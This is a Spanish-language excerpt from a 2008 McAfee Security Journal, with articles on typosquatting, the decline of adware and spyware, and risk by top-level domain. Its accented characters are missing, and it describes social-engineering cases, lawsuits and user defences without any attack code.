en junio de 2008, la corporacin de Internet para nmeros y nombres asignados (Icann) aprob un documento para que se acelerase el proceso de creacin de ms dominios de nivel superior. adems de los dominios familiares a la mayora de los usuarios, ya existen dominios menos utilizados como .info, .biz, .museum y .travel. no pasar mucho tiempo antes de que veamos nuevos dominios como .nyc o .lib (como algunos han sugerido). Ms dominios de nivel superior significan ms oportunidades de ciberocupacin (para poder registrar con exactitud marcas comerciales conocidas o para crear variaciones tipogrficas de nombres famosos). cuando los usuarios solicitan estos dominios, ya sea en intentos equivocados de alcanzar sitios reales o en intentos fallidos de escribir direcciones verdaderas de sitios, los typosquatters pueden colarse con sus intrusos ilegales. Pero existen indicios de que el typosquatting no tardar en caer en declive. Uno de ellos es que algunos sitios Web importantes han tomado medidas para protegerse a s mismos y a sus clientes de los typosquatters. Por ejemplo, en 2006, neiman Marcus demand al registrador de dominios Dotster. neiman Marcus aleg que Dotster registr numerosos dominios que infringan las marcas de neiman Marcus, mostrando los anuncios para maximizar sus ingresos desde estos sitios de typosquatting. el argumento de neiman Marcus fue que Dotster actu no slo como registrador para estos dominios sino tambin como registrante, ya que eligi qu dominios registrar y recogi los beneficios de los anuncios resultantes. el caso se resolvi en 2007 en trminos privados y neiman Marcus ha continuado demandando desde entonces a otros ciberocupas de envergadura. (Una revelacin: fui asesor de neiman Marcus en algunos de estos casos.) Verizon y Microsoft tambin han estado atentos en litigios similares. Por una parte, estos casos no son especialmente frecuentes. Pero las indemnizaciones que establece la acPa (un mnimo de 1.000 dlares por dominio) pueden obligar a los typosquatters a desembolsar mucho dinero por sus infracciones a gran escala. slo Microsoft ha recibido ms de 2 millones de dlares en indemnizaciones por typosquatting. adems, existen rumores persistentes que sugieren que las redes publicitarias ms importantes, particularmente google, podran abandonar la industria del typosquatting. Una reciente demanda colectiva de propietarios de marcas comerciales ha puesto en tela de juicio el papel de google en la financiacin de la industria del typosquatting, ya que colocacin de estos anuncios en sitios de typosquatting ha sido una fuente constante de reclamaciones

de anunciantes y propietarios de marcas comerciales. si google dejara de financiar el typosquatting, los typosquatters tendran muchos menos incentivos para registrar dominios ilegales; es probable que ninguna otra red publicitaria les pague tanto como lo hace google. (Una revelacin: soy colaborador de la defensa en la demanda colectiva de propietarios de marcas comerciales de Vulcan golf y otros contra google y otros, en relacin a la responsabilidad de google por los sitios de typosquatting en los que google paga por colocar anuncios.)

Defensas
aunque las batallas de typosquatting continan, los usuarios preocupados pueden hacer mucho para protegerse. en primer lugar, tenga cuidado cuando teclee. est atento al typosquatting, especialmente cuando solicite un sitio difcil de deletrear. Tratar de adivinar un nombre de dominio puede que no sea la mejor opcin; considere en su lugar la utilizacin de un motor de bsqueda. en segundo lugar, tras llegar a un sitio, mire dos veces antes de continuar. es ste de verdad el sitio al que quera llegar? se trata de un enlace normal o un anuncio pagado? Debera este sitio del gobierno tener realmente un .com, o tal vez el correspondiente .gov? Un poco de sentido crtico puede servirle como defensa contra el typosquatting u otros ataques. el software adecuado tambin puede ayudar a proteger a los usuarios contra los typosquatters. la tecnologa siteadvisor identifica muchos sitios de typosquatting. Un servicio de proteccin tipogrfica, como openDns, proporciona una proteccin adicional. los motores de bsqueda normalmente ofrecen ayuda del tipo: Quizs quiso decir ... con la correccin hecha, de modo que los usuarios pueden evitar muchos sitios de typosquatting realizando bsquedas en lugar de escribir nombres de dominios directamente en la barra de direcciones del navegador.

Benjamin Edelman es profesor adjunto en Harvard Business school, donde estudia mercados electrnicos y fraude en lnea. Tambin es consejero especial del servicio siteadvisor de Mcafee, donde ofrece una perspectiva independiente para complementar las puntuaciones del sitio siteadvisor. aunque es un mecangrafo rpido y preciso, el profesor edelman se ha embarcado ocasionalmente en aventuras involuntarias de navegacin.

NOTAS
1 large-scale registration of Domains with Typographical errors, (registro de dominios a gran escala con errores tipogrficos) enero de 2003. Harvard law school. (http://cyber.law.harvard.edu/archived_content/people/edelman/typo-domains/)

APNDICE
Ejemplos de sitios de typosquatting: Cartoonnetwork.com entre los ms de 80.000 dominios encontrados en la inspeccin de mayo de 2008 de siteadvisor, aparecen estas variantes de typosquatting para cartoonnetwork.com: ccartoonnetwork.com dcartoonnetwork.com ncartoonnetwork.com cfartoonnetwork.com ceartoonnetwork.com ckartoonnetwork.com jcartoonnetwork.com vcartoonnetwork.com caertoonnetwork.com caortoonnetwork.com cairtoonnetwork.com cuartoonnetwork.com acartoonnetwork.com bcartoonnetwork.com canrtoonnetwork.com

oToo 2008

37

Qu ha sido del adware y el spyware?

Aditya Kapoor

el adware y el spyware son dos de las principales herramientas que se utilizan en Internet para marketing y distribucin de distribuir publicidad.
estas aplicaciones suelen aprovecharse de metodologas de ingeniera social y a menudo se adhieren a aplicaciones de freeware o shareware que el usuario desea descargar y que por lo dems s son tiles. lo habitual es que las aplicaciones no deseadas incluyan acuerdos de licencia de usuario final (eUla) que supuestamente definen su comportamiento, pero en general la descripcin no es explcita y no hace sino confundir al usuario y abrir la puerta a otras trampas de ingeniera social. en la primera mitad de esta dcada, se produjo un crecimiento exponencial del adware y el spyware denominados con frecuencia programas no deseados o PUP. sin embargo, a partir de 2005 su nmero ha decrecido de forma constante. en este artculo analizaremos los principales cambios en los modelos de compensacin online que estn provocando este descenso. en su mayora, el adware y el spyware actan de formas diferentes: el primero funciona con aplicaciones ms limpias y un mejor modelo de consentimiento del usuario desarrollados por las principales firmas de adware; el segundo es a veces malintencionado y con frecuencia se considera malware de tipo troyano. esta divisin relativamente clara ha ayudado a mantener reducido el nmero de aplicaciones de adware y spyware. Por lo tanto, si estos PUP ya no constituyen ninguna amenaza, desaparecern pronto para siempre? Para responder a esta pregunta, examinaremos el cambiante panorama de amenazas y el papel que desempea la ingeniera social.

Adware Tipo de software publicitario con capacidad para distribuir contenido publicitario de un modo o en un contexto que puede resultar inesperado e inoportuno para el usuario. el documento risk Model (Modelo de riesgos) de la asc detalla muchos de los comportamientos susceptibles de ser considerados inesperados o inoportunos. adems, numerosas aplicaciones de adware realizan funciones de rastreo y, por lo tanto, tambin pueden clasificarse como tecnologas de seguimiento. si hay consumidores que se oponen a este seguimiento, no les interesa la publicidad que genera el programa o les molesta su efecto sobre el rendimiento del sistema, lo ms probable es que deseen eliminar el adware. Por su parte, puede que otros usuarios prefieran conservar determinados programas de adware si su presencia sufraga el coste del producto o servicio que desean o si los anuncios les resultan tiles, como cuando suponen una alternativa o complemento a lo estn estudiando o buscando. Spyware en sentido estricto, el trmino spyware se utiliza para referirse al software de seguimiento que se instala sin el correspondiente aviso, consentimiento o control del usuario. en un sentido ms amplio, se utiliza con el significado que la asc otorga a spyware (y otras tecnologas potencialmente no deseadas): tecnologas que se instalan sin el correspondiente consentimiento del usuario o de formas que merman su control sobre: cambios fundamentales que afectan a su experiencia, a su privacidad o a la seguridad del sistema el uso de los recursos del sistema, incluso qu programas se instalan en el equipo la recopilacin, utilizacin y distribucin de informacin personal o confidencial

Definiciones
los trminos adware y spyware se emplean a menudo de manera imprecisa e indistinta, lo cual suele generar confusin. aqu nos ceiremos a las definiciones que propone la coalicin antispyware (asc, anti-spyware coalition)1.

38

McaFee secUrITy JoUrnal

al advertir que el trmino spyware ha perdido en gran medida su significado exacto, los miembros de la asc han decidido limitar el uso de spyware (en su sentido estricto) a los documentos tcnicos. Igualmente, en vista de la imposibilidad de evitar las connotaciones ms amplias derivadas del uso popular, la asc tambin admite la existencia de una interpretacin general que incluye todos los PUP. en este artculo, el trmino spyware no se emplea nunca en su sentido amplio, sino siempre en sentido estricto, es decir, como software relacionado con marketing. Para designar programas espa puros, como los registradores de pulsaciones, utilizamos el trmino software de supervisin.

la aplicacin de adware sin el conocimiento de los usuarios. antes de instalarse, muchas de estas aplicaciones muestran un eUla, sin embargo, para evitar la preocupacin de los visitantes, seguramente Fernando resuelva retocar la aplicacin para suprimir el eUla y elevar el nmero de instalaciones. en este momento, si Fernando es un hacker experimentado, podra replicar este modelo en miles de sitios no seguros para multiplicar sus instalaciones y beneficios de forma exponencial. Benjamin edelman, redactor de McAfee Security Journal, describe una situacin real de este tipo en su sitio Web5. el modelo de compensacin PPI demostr ser muy lucrativo para programadores e individuos malintencionados, algo que sin duda contribuy al enorme crecimiento del adware y el spyware. este modelo puede utilizarse con numerosos vectores de instalacin, que se dividen en dos categoras generales:

Un rpido despegue
el adware y el spyware captaron nuestra atencin en el ao 2000 con la aparicin de adware-aureate, que utilizaba el historial de navegacin del usuario para mostrar anuncios. este programa motiv la creacin de una de las primeras aplicaciones antispyware, optout de gibson research corp2. el crecimiento del adware y el spyware comenz a ser notable hacia finales de 2004 y alcanz su apogeo en 2005 (vanse las Figuras 1 y 2). su principal objetivo era generar ingresos instalndose en el escritorio de millones de usuarios (mediante el modelo de pago por instalacin) y mostrar anuncios (con el modelo de pago por clic). Durante estos aos la industria del adware y el spyware floreci por la gran cantidad de ingresos que generaba la publicidad. cada vez que un usuario haca clic en un determinado anuncio, el anunciante reciba una comisin.

Ingeniera social Precisa la interaccin del usuario y cuenta con que ste instale y, en algunos casos, incluso propague el software. el nmero de mtodos de ingeniera social tiene como nico lmite la imaginacin de los agresores, capaces de atraer incluso a los usuarios ms desconfiados. en el ejemplo de Fernando Fernndez, ofrecer juegos gratuitos o tonos de llamada es un cebo que mucha gente no puede resistir. lo que el usuario decide en ltima instancia es asumir el riesgo o quedarse sin el regalo.

Adware 5.000
4.000 3.000 2.000 1.000 0 2000 2001 2002 2003 2004 2005 2006 2007 2008 previsin

Modelos de compensacin y advertencias

el adware y el spyware utilizan dos importantes modelos de compensacin para la publicidad online. ambos funcionan bien en un mundo ideal, pero corren la misma suerte en un mundo donde hay personas malintencionadas? analicemos cmo puede sacarse provecho de estos modelos.

Pago por instalacin: el modelo del lado cliente3

en el modelo de pago por instalacin (PPI), las empresas que venden productos o servicios pagan al distribuidor de adware por mostrar los anuncios. a su vez, el distribuidor de adware paga a personas o afiliados por distribuir su adware en paquetes o por otros medios. (Zangocash, por ejemplo, paga entre 0,75 y 1,45 dlares en ee. UU. por cada unidad de adware instalada4). al final el software debe instalarse en el equipo del cliente. el modelo PPI normalmente lleva un seguimiento de las instalaciones de software mediante un intermediario concreto. es decir, si Fernando Fernndez tiene en su sitio Web un instalador de adware basado en PPI y otro usuario descarga e instala ese software a travs de ese sitio, Fernando recibir una cantidad determinada de dinero. Para incrementar las descargas de su sitio, es posible que Fernando intente intensificar el trfico con contenido que despierte inters, como ttulos llamativos, vdeos o imgenes para adultos, juegos gratuitos y tonos de llamada. con el aumento del trfico y los ingresos, puede que Fernando decida aprovechar alguna vulnerabilidad para instalar

Figura 1: El crecimiento del adware alcanz su apogeo en 2005. (Fuente: McAfee Avert Labs)

Spyware y software de supervisin 300

250 200 150 100 50 0 2000 2001 2002 2003 2004 2005 2006 2007 2008 previsin

Spyware Programas de supervisin

Figura 2: El spyware y los programas de supervisin tambin han experimentado un descenso general desde 2005, pero prevemos un repunte para finales de 2008. (Fuente: McAfee Avert Labs)

oToo 2008

39

Ataques que aprovechan vulnerabilidades lo habitual es que con estos ataques la instalacin de adware no requiera ninguna interaccin humana, pero en muchos casos se atrae al usuario con tcnicas de ingeniera social para que visite sitios Web malintencionados que albergan este tipo de ataques.

aspectos de la ingeniera social

Los piratas informticos siempre buscan el eslabn ms dbil de la cadena de seguridad, que invariablemente son las personas. Kevin Mitnick (2007)11 sea cual sea el modelo de adware que utilicen los desarrolladores, el principal factor de xito reside en los usuarios. en nuestro ejemplo de Fernando Fernndez, la causa de que se infectasen los equipos fue que los usuarios visitaron el sitio Web malicioso incitados por las tcticas de ingeniera social de Fernando. Una razn del frecuente xito de la ingeniera social es que muchas personas confan en lo que ven y, por naturaleza, no recelan de algunas actividades en la Web. los ingenieros sociales malintencionados saben cmo aprovecharse de la naturaleza humana. Un estudio de casos reales llevado a cabo en el Departamento de Interior estadounidense seala que el 84% de los ministerios atribuye diversas brechas de seguridad a errores humanos, errores que el 80% achaca a la falta de formacin o conocimientos sobre seguridad o a la omisin de los procedimientos12. cientos de miles de programas de malware utilizan ingeniera social para instalarse en los equipos de los usuarios: ste es uno de los vectores ms frecuentes de distribucin de malware. Matthew Braveman clasifica los distintos vectores de instalacin en cuatro categoras principales13. segn su estudio, casi un tercio del malware se instala mediante mtodos de ingeniera social. el adware y el spyware han adoptado muchas metodologas conocidas de ingeniera social y han inventado tcnicas nuevas para distribuir su software. la ingeniera social es el vector de instalacin preferido del modelo PPI y el que ofrece ms opciones para distribuir adware y spyware. estas aplicaciones pueden distribuirse con mecanismos aparentemente inocuos, como paquetes de freeware, o con mecanismos sospechosos, como spam o datos adjuntos a mensajes de correo electrnico con texto engaoso. Por ejemplo, un usuario que desee un programa de freeware puede, a sabiendas, instalar adware para utilizar los servicios gratuitos. aun si la instalacin se produce a travs de un ataque que aprovecha alguna vulnerabilidad o por spam directo, es posible que las empresas de seguridad tampoco califiquen el software como malintencionado porque el proveedor afirmar que no tiene nada que ver con la distribucin y que alguien se est aprovechando de su software.

Pago por clic: el modelo del lado servidor6

el modelo de pago por clic (PPc) presenta dos variantes: anuncios patrocinados y anuncios por contenido. el modelo PPc no exige la instalacin de ningn programa de adware ni spyware en el sistema del usuario, pero quiz s necesite que el usuario introduzca informacin para que el contextopor ejemplo, los resultados del motor de bsquedapresente los anuncios correspondientes. los anuncios por contenido de google, por ejemplo, funcionan con el modelo PPc. algunos de los mecanismos ms utilizados para distribuir contenido PPc son:

Anuncios de banner los anuncios se muestran en un banner o en un espacio predefinido. este contenido puede variar. Anuncios emergentes en primer o segundo plano los anuncios se presentan en ventana distintas, lo que resulta molesto para el usuario. Anuncios en flash son similares a los anuncios de banner, pero utilizan animaciones Flash para diversificar el contenido.

el modelo PPc es capaz de funcionar en un entorno mucho ms controlado que permite al sitio Web que incluye los anuncios elegir el mecanismo de distribucin. aunque el modelo PPc est basado en servidor y puede parecer ms seguro, no es del todo infalible. los timadores disponen de tcnicas engaosas para estafar a los usuarios7. si tenemos en cuenta que gran parte del contenido del anuncio est almacenado en servidores y que utiliza Javascript, Flash y otras tecnologas con contenido multimedia, no resulta difcil insertar publicidad malintencionada en su secuencia8, 9. en un caso de este tipo, una red publicitaria propiedad de yahoo distribua sin saberlo anuncios de banner malintencionados que acaban descargando troyanos en el equipo del usuario. en este caso concreto, los anuncios de banner se mostraban en sitios Web como Myspace y PhotoBucket. estos anuncios malintencionados se introducan inadvertidamente en la red publicitaria de yahoo. Tambin hemos observado que los clics del usuario se secuestran mediante envenenamiento de cach Dns10. sin embargo, en estos casos los usuarios no se ven directamente afectados; el ms vulnerable a estas amenazas es el IsP o el servidor que contiene los anuncios. Para restarle fuerza a los vectores de ataque que aprovechan estos modelos de compensacin, vamos a analizar brevemente el importante papel que desempea la ingeniera social en este mercado electrnico que promete infinitas posibilidades de generar ingresos.

Si tenemos en cuenta que gran parte del contenido del anuncio est almacenado en servidores y que utiliza JavaScript, Flash y otras tecnologas con contenido multimedia, no resulta difcil insertar publicidad malintencionada en su secuencia.

40

McaFee secUrITy JoUrnal

Sitio Web de red social nivel de confianza alto Motor de bsqueda nivel de confianza bajo Usuario Vnculo recibido a travs de MI, correo electrnico, spam nivel de confianza muy bajo Vnculo recibido a travs del perfil de un amigo en sitio de red social, bloc de notas de Google, dominio de confianza, etc. nivel de confianza alto

Sitio Web de ingeniera social (p. ej., ofrece vnculos a archivos MP3, vdeos para adultos, etc.)

Figura 3: Varios vectores exponen a los usuarios a programas malintencionados y no deseados.

Cuestin de confianza
la Figura 3 muestra cuatro situaciones en las que el usuario se expone a un sitio de ingeniera social. aunque la ilustracin es simple, puede ayudarnos a comprender los siguientes casos reales. la clave est en que cuanto mayor sea el nivel de confianza, ms probabilidades de xito tendr una determinada tcnica de ingeniera social. Vemoslo en detalle utilizando tres casos reales.

Caso 2: anuncios de banner

los anuncios de banner pertenecen al dominio del modelo PPc. en estas situaciones el nivel de confianza es muy elevado, ya que los usuarios entran en un sitio de confianza que visitan a menudo.

Caso 1: sitios Web de redes sociales

los sitios de redes sociales son de gran ayuda para los ingenieros sociales porque la mayora de las personas que entran en ellos buscan hacer amigos o mantenerse en contacto. Puede que los ingenieros sociales establezcan relaciones para aumentar el factor de confianza, como en la parte superior de la Figura 3. el nivel de confianza suele ser muy elevado en esta categora. Varios ataques destacados de ingeniera social se han aprovechado de esta confianza para instalar adware en los equipos de los usuarios:

en 2006, The Washington Post denunci un anuncio de banner malintencionado en Myspace que distribua adware y troyanos a millones de usuarios aprovechando las vulnerabilidades de los metarchivos de Microsoft Windows, para lo cual no haca falta la intervencin del usuario17. en 2008, los anuncios de banner malintencionados han experimentado un aumento. el ms reciente mientras se escriba este artculo fue un anuncio en Flash publicado en usatoday.com18. slo por visitar la pgina, los usuarios eran bombardeados con mltiples alertas falsas y de malware (una tctica de ingeniera social muy frecuente) para que descargaran una aplicacin antispyware no autorizada denominada Malware alert. (los programas no autorizados pueden incluir PUP y tambin troyanos).

Visualizador de contenido para adultos de Myspace (nivel de confianza: medio). este problema se produca cuando un usuario haca clic en un anuncio emergente que mostraba imgenes de jvenes con ttulos como Quiero que me quieran14. al hacer clic en estos anuncios se bajaba el software Myspace adult content que, segn se ha sabido, descargaba adware. Vdeo fraudulento de youTube en Myspace (nivel de confianza: alto). a finales de 2006 Websense denunci la publicacin de un vdeo fraudulento de youTube en mltiples perfiles falsos de Myspace15. Para ver el vdeo, haca falta instalar Zangocash. aplicacin secret crush para Facebook (nivel de confianza: muy alto). en enero de 2008, Fortinet public una advertencia de seguridad sobre un widget malicioso denominado secret crush (amor secreto) que intentaba instalar adware16. esta tctica de ingeniera social funcionaba enviando primero una solicitud de Facebook titulada Invitacin de un amor secreto. al abrir la solicitud, el usuario tena que instalar un widget para averiguar quin le enviaba la invitacin. a continuacin, antes de desvelar quin era el amor secreto, la solicitud peda al usuario que reenviara la invitacin a cinco amigos. los ms ingenuos reenviaban el mensaje a sus amigos y as creaban un gusano social. Despus de todos estos pasos, lo nico que vean las vctimas era un mensaje para descargar el adware Zango. se dejaban llevar fcilmente por la situacin porque su nivel de confianza era muy elevado.

Caso 3: otras tcticas sugerentes

Mensajes de correo electrnico falsificados (nivel de confianza: bajo). Hubo un caso en que se enviaron masivamente mensajes falsificados de eBay con vnculos para descargar adware19. el factor de ingeniera social se encontraba en el contenido del mensaje, que adverta a los confiados usuarios de que haba un problema con sus datos de facturacin y de que tenan que actualizarlos descargando un determinado software. Pginas de error falsas (nivel de confianza: medio). algunos sitios Web mostraban mensajes de error falsos tipo pgina no encontrada y se ofrecan a resolver la situacin descargando un componente activeX que instalaba WinFixer20. spam en el bloc de notas de google (nivel de confianza: alto). Hace poco los timadores utilizaron otra tcnica ms de ingeniera social enviando vnculos de spam a pginas del bloc de notas de google21. el hipervnculo tena el formato www.google.com/ notebook/public/[IDusuario]/[bloqueado]. la gente es menos suspicaz si se trata del dominio google.com, por lo que se atreven a hacer clic en las pginas Web malintencionadas, que contienen numerosos vnculos a sitios para adultos o vdeos falsos. Finalmente stos descargan varias aplicaciones antispyware no autorizadas.

oToo 2008

41

retirada silenciosa
la falta inicial de normativas que regularan las aplicaciones de adware y spyware dio mucha libertad a los desarrolladores, tanto si su motivacin era puramente econmica como si era verdaderamente malintencionada. al principio, los usuarios parecan protegidos porque el eUla les adverta de todos los efectos no deseados de estas aplicaciones. Pero muchas veces los eUla eran confusos, estaban incompletos o haba que buscarlos. al encontrarlos, eran difciles de leer, a menudo por estar encerrados en ventanas diminutas en las que slo caban unas pocas palabras. con una cortina de humo tan eficaz, por qu han disminuido el adware y el spyware? los factores que han contribuido son varios.

Dado que ahora los anunciantes conocen los riesgos asociados al modelo PPI (invasin de la intimidad, consentimiento impropio y otros), han comenzado a adoptar el modelo PPc, que no exige que haya ninguna aplicacin en el sistema del usuario.

aplicaciones no autorizadas
como los creadores de malware hacen dinero fcil con tcticas intimidatorias, tienden cada vez ms a distribuir aplicaciones no autorizadas y troyanos de alertas falsas, que muestran errores o mensajes de infeccin falsos. en la mayora de los casos, los troyanos de alertas falsas son los que descargan las aplicaciones no autorizadas que detectan claves de registro y archivos falsos como malware. a veces, son las propias aplicaciones no autorizadas las que introducen los archivos para detectarlos despus; en estos casos, la aplicacin no autorizada garantiza la clasificacin como troyano (estos troyanos estn incluidos en la Figura 4). Tambin hemos observado muchos casos de adware instalado por troyanos. la categora de troyano Downloader-Ua es una familia que utiliza tcticas de ingeniera social para descargar programas falsos. Descubierta a finales de 2004, esta familia emplea vulnerabilidades del modo en que el reproductor de Microsoft Windows Media utiliza la tecnologa de gestin de derechos digitales embaucando a los usuarios para descargar archivos multimedia de diseo especial31,32. esta misma familia de troyanos atac de nuevo en 2008 persuadiendo a los usuarios de que se bajaran un reproductor de MP3 falso para or una seleccin de temas, pero a la vez descargaba montones de adware en el sistema33. en comparacin con aos anteriores, el crecimiento de las aplicaciones no autorizadas (PUP y troyanos) ha sido exponencial en 2008 (Vase la Figura 4). Para medir la frecuencia de los productos antispyware no autorizados que distribuyen los troyanos Downloader, analizamos una serie de direcciones IP desde las que se iniciaban estas descargas. la consulta realizada en el dominio hosts-files.net devolvi 158 dominios asociados a una misma direccin IP34 (vase la Figura 5).
Aplicaciones no autorizadas
1.000 500 0

Pleitos Debido al incremento de abusos de las aplicaciones de adware y spyware, los consumidores y otros demandantes han entablado diversos pleitos contra algunos distribuidores de envergadura.22,23,24,25,26,27. Varias sentencias judiciales han contribuido a limitar la cantidad de adware y spyware. Por ejemplo, en la resolucin contra Zango12, el tribunal exige que Zango controle a sus distribuidores terceros para asegurarse de que afiliados y subafiliados cumplen la decisin de la comisin de comercio Federal (FTc, Federal Trade commission). el fallo tambin prohbe a Zango, directamente o a travs de otros, aprovechar vulnerabilidades de seguridad para descargar software y le obliga a mostrar explicaciones claras y visibles, as como a obtener el consentimiento expreso de los consumidores antes de descargar el software en su equipo. estos fallos judiciales han servido para debilitar el mtodo PPI y han supuesto un incentivo para que los distribuidores mejoren su comportamiento.

Concienciacin pblica y organismos del sector la FTc posee un sitio Web informativo28 que aconseja sobre cmo protegerse del spyware y denunciar sus abusos. la asc tambin ofrece gran cantidad de informacin y detalles sobre esta amenaza29. gracias al esfuerzo de estos grupos, los consumidores y legisladores comprenden mucho mejor las reglas y los problemas relacionados con la publicidad en Internet. este conocimiento ha ayudado a reducir el nmero de aplicaciones no deseadas. Mala prensa y pleitos potenciales contra anunciantes relacionados con empresas de adware el dinero que haca funcionar el mercado del adware y el spyware provena inicialmente de anunciantes que recurran a empresas de adware para mostrar los anuncios. al principio, estas empresas de productos y servicios no investigaban a fondo la manera en que las empresas de adware distribuan su publicidad. en una resolucin histrica dictada el 29 de enero de 200730 se estableca que antes de contratar a una firma para la distribucin de su publicidad, y de forma trimestral a partir de entonces, las empresas deben investigar cmo se distribuyen sus anuncios en Internet. las empresas deben interrumpir inmediatamente el uso de los programas de adware que infrinjan las resoluciones alcanzadas o sus propias directivas de adware.

2005

2006

2007

2008 previsin

PUP Troyano

Figura 4: A diferencia del adware y el spyware, las aplicaciones no autorizadas (PUP y troyanos) han aumentado drsticamente en 2008. (Fuente: McAfee Avert Labs)

42

McaFee secUrITy JoUrnal

conclusin
slo desde el punto de vista estadstico, parece claro que el adware y el spyware estn disminuyendo. sin embargo, las sugerentes tcticas de ingeniera social que se utilizan para distribuir estos PUP siguen entre nosotros, distribuyendo troyanos y aplicaciones no autorizadas. con el ascenso del modelo del lado servidor (PPc) en la distribucin publicitaria, sin duda aparecern tcticas mejoradas de ingeniera social que incitarn a los usuarios a hacer clic en estos anuncios y generar ingresos para los afiliados. la distribucin de adware y troyanos seguir ganando terreno en los sitios de redes sociales. aunque el nmero total de programas de adware y spyware ha descendido, no prevemos que en un futuro prximo surjan soluciones fciles para el problema de los programas no deseados. siendo las empresas de adware quienes pagan estas instalaciones, su deber moral sera llevar un seguimiento de cada instalacin y detener rpidamente cualquier mala distribucin posible de su software. Pero lo harn de verdad? el cambiante panorama de amenazas y el aumento de los troyanos con fines lucrativos nos obliga a permanecer atentos y ensear a trabajadores y usuarios particulares a entender mejor lo que supone la amenaza de la ingeniera social.

Figura 5: Varios nombres de host estn asignados a una sola direccin IP que distribuye aplicaciones localizadas no autorizadas.

cada uno de los dominios que contiene la Figura 5 muestra un antispyware personalizado o un limpiador del sistema no autorizados. las pginas tambin aparecen en varios idiomas. al analizar 620 pginas, descubrimos que se haban creado pginas y aplicaciones en 24 idiomas, lo que indica que las amenazas se han extendido mucho ms all de los pases angloparlantes. en ms de una ocasin la misma IP estaba asociada a mltiples dominios, en algunos casos hasta 200 dominios diferentes. Una consulta de la palabra clave Fsa (que hosts-files.net describe como una clase de dominios que albergan aplicaciones no autorizadas) devolvi cerca de 3.600 dominios que distribuyen aplicaciones no autorizadas35.

Aditya Kapoor es investigador snior en Mcafee avert labs. conoci la ingeniera inversa hace seis aos cuando investigaba en la Universidad de luisiana en lafayette para su tesis de doctoral, que vers sobre un algoritmo de desensamblaje para resolver la ocultacin de cdigo. en Mcafee, Kapoor se ha especializado en anlisis de rootkits, comparacin de cdigos de bytes y anlisis de comportamiento. le gusta viajar y estudiar diferentes culturas y arquitecturas.

NOTAS
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 http://www.antispywarecoalition.org/documents/2007glossary.htm optout (no participar), gibson research corp. http://www.grc.com/optout.htm http://en.wikipedia.org/wiki/compensation_methods (Fuente: sitio Web de Zango. http://www.cdt.org/headlines/headlines.php?iid=51 http://www.benedelman.org/news/062907-1.html http://en.wikipedia.org/wiki/compensation_methods#Pay-per-click_.28PPc.29 http://www.benedelman.org/ppc-scams/ http://msmvps.com/blogs/spywaresucks/archive/2007/08/22/1128996.aspx http://www.theregister.co.uk/2007/09/11/yahoo_serves_12million_malware_ads/ http://www.secureworks.com/research/threats/ppc-hijack/ http://www.csc.com/cscworld/012007/dep/fh001.shtml http://www.usgs.gov/conferences/presentations/5socialengineeringInternal externalThreat%20Dudeck.ppt http://download.microsoft.com/download/c/e/c/ cecd00b7-fe5e-4328-8400-2550c479f95d/social_engineering_Modeling.pdf http://mashable.com/2006/10/11/myspace-adult-content-viewer-more-adware/ http://securitylabs.websense.com/content/alerts/1300.aspx http://www.fortiguardcenter.com/advisory/Fga-2007-16.html http://blog.washingtonpost.com/securityfix/2006/07/ myspace_ad_served_adware_to_mo.html http://securitylabs.websense.com/content/alerts/3061.aspx 19 http://securitylabs.websense.com/content/alerts/738.aspx 20 http://www.avertlabs.com/research/blog/index.php/2006/12/04/404-not-just-filenot-found/ 21 http://www.cantoni.org/2008/06/04/google-notebook-spam 22 http://www.benedelman.org/spyware/nyag-dr/ 23 http://www.oag.state.ny.us/media_center/2005/apr/apr28a_05.html 24 http://www.internetlibrary.com/cases/lib_case358.cfm 25 http://blogs.zdnet.com/spyware/?p=655 26 http://www.ftc.gov/opa/2006/11/zango.shtm 27 http://www.ftc.gov/bcp/edu/microsites/spyware/law_enfor.htm 28 http://onguardonline.gov/spyware.html 29 http://www.antispywarecoalition.org/ 30 http://www.oag.state.ny.us/media_center/2007/jan/jan29b_07.html 31 http://www.pcworld.com/article/119016/risk_your_pcs_health_for_a_song.html 32 http://vil.nai.com/vil/content/v_130856.htm 33 http://www.avertlabs.com/research/blog/index.php/2008/05/06/fake-mp3srunning-rampant/ 34 http://hosts-file.net/?s=67.55.81.200&sDM=1#matches 35 http://hosts-file.net/?s=Browse&f=Fsa

oToo 2008

43

cul es el riesgo de los dominios de nivel superior?

David Marcus

los datos de Mcafee siteadvisor revelan la variacin del riesgo en funcin del rea geogrfica.
en su excelente informe Mapping the Mal Web, revisited (el mapa de los sitios Web peligrosos, revisin), publicado en el nmero de junio de 2008 de la revista Mcafee security Insights1, nuestro compaero shane Keats examinaba con detenimiento la distribucin en Internet de los sitios Web malintencionados. Para ello, utilizaba datos obtenidos mediante la tecnologa Mcafee siteadvisor. en el momento que vivimos, todos necesitamos saber por dnde se puede navegar y buscar informacin sin correr riesgos. Pero si Internet es realmente un enorme barrio digital, reflejo de cualquier gran ciudad del mundo, cules son las calles por las que se puede transitar sin peligro? Qu dominios presentan ms riesgos? cules son los dominios de nivel superior (TlD) que incorporan ms mejoras en cuanto a seguridad? y cules menos? Qu palabras de bsqueda son ms peligrosas? estas son las preguntas, entre muchas otras, que se hacen los usuarios de Internet. el objetivo de la revista McAfee Security Journal es ayudarle a obtener respuestas mediante datos y anlisis que le permitan tomar las decisiones ms adecuadas. en este nmero, resumimos datos de amenazas recientes que afectan a dominios de nivel superior: tanto genricos: .com, .info, .biz , entre otros, como de pases: .cn, .ru, .br, etc. examinamos en detalle no slo los niveles de riesgo actuales de estos dominios en amrica, europa y asia, sino tambin su evolucin en el ltimo ao. Hemos clasificado cada dominio TlD segn su riesgo general y, a continuacin, hemos realizado anlisis adicionales de correo electrnico, seguridad en las descargas y la prevalencia de ataques basados en la Web. Finalmente, hemos aislado los veinte principales dominios de nivel superior para cada tipo de riesgo. los resultados son asombrosos. el riesgo no se reparte equitativamente en toda la red, como muestran los datos con claridad. los dominios genricos y de pases muestran distintos tipos y grados de riesgo y peligros. algunos pases tienen buenos hbitos en el correo electrnico pero demuestran malas prcticas en la gestin de las descargas. otros han albergado ataques a vulnerabilidades o cdigo malintencionado. esperamos que estos resultados le sirvan de ayuda al navegar y no lo olvide: mire bien a izquierda y derecha antes de cruzar la autopista de Internet! Los grficos en el grfico Dominios TlD en europa, oriente Medio y frica clasificados por riesgo general, observar que el dominio de rumana (.ro) ha registrado casi el siete por ciento. esto significa que, segn el software siteadvisor, Mcafee ha descubierto que casi el siete por ciento de todos los sitios en ese dominio de nivel superior han sufrido una o varias de las amenazas que hemos incluido en el anlisis: ataques a vulnerabilidades de navegadores, adware/spyware/troyanos/ virus, gran volumen de correo 